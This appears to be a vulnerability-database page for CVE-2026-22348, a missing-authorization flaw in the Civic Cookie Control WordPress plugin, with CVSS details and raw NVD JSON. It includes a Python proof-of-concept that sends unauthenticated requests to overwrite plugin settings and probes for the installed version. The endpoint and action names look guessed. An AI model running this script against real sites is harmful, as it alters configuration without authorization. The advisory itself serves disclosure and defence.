Security Vulnerability Report
中文
CVE-2026-22348 CVSS 5.3 MEDIUM

CVE-2026-22348

Published: 2026-01-22 17:16:31
Last Modified: 2026-04-28 19:36:30

Description

Missing Authorization vulnerability in Tasos Fel Civic Cookie Control civic-cookie-control-8 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Civic Cookie Control: from n/a through <= 1.53.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Civic Cookie Control <= 1.53

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22348 PoC - Civic Cookie Control Broken Access Control # Affected: Civic Cookie Control <= 1.53 import requests import json target = "http://target-wordpress-site.com" # PoC 1: Access admin functionality without authentication def poc_unauthorized_access(): """ This PoC demonstrates accessing admin functions without proper authorization. The plugin fails to verify user capabilities before executing sensitive operations. """ # Try to access plugin settings endpoint endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-json/civic-cookie-control/v1/settings" ] for endpoint in endpoints: headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Malicious payload targeting the vulnerable endpoint payload = { "action": "civic_cookie_control_save_settings", "settings": { "consentMode": "all", "apiKey": "malicious_key" } } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] Potential vulnerability at: {endpoint}") print(f"[*] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[*] Request failed: {e}") # PoC 2: Enumerate vulnerable versions def check_version(): """ Check if target is running vulnerable version of the plugin. """ version_urls = [ f"{target}/wp-content/plugins/civic-cookie-control/readme.txt", f"{target}/wp-content/plugins/civic-cookie-control/civic-cookie-control.php" ] for url in version_urls: try: resp = requests.get(url, timeout=10) if "Version:" in resp.text or "version" in resp.text.lower(): print(f"[*] Found version info at: {url}") except: pass if __name__ == "__main__": print("[*] CVE-2026-22348 PoC - Civic Cookie Control Broken Access Control") print("[*] Target: Civic Cookie Control <= 1.53") poc_unauthorized_access() check_version()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22348", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:31.363", "lastModified": "2026-04-28T19:36:30.427", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Tasos Fel Civic Cookie Control civic-cookie-control-8 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Civic Cookie Control: from n/a through <= 1.53."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en Tasos Fel Civic Cookie Control civic-cookie-control-8 permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configuradas. Este problema afecta a Civic Cookie Control: desde n/a hasta &lt;= 1.53."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/civic-cookie-control-8/vulnerability/wordpress-civic-cookie-control-plugin-1-53-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}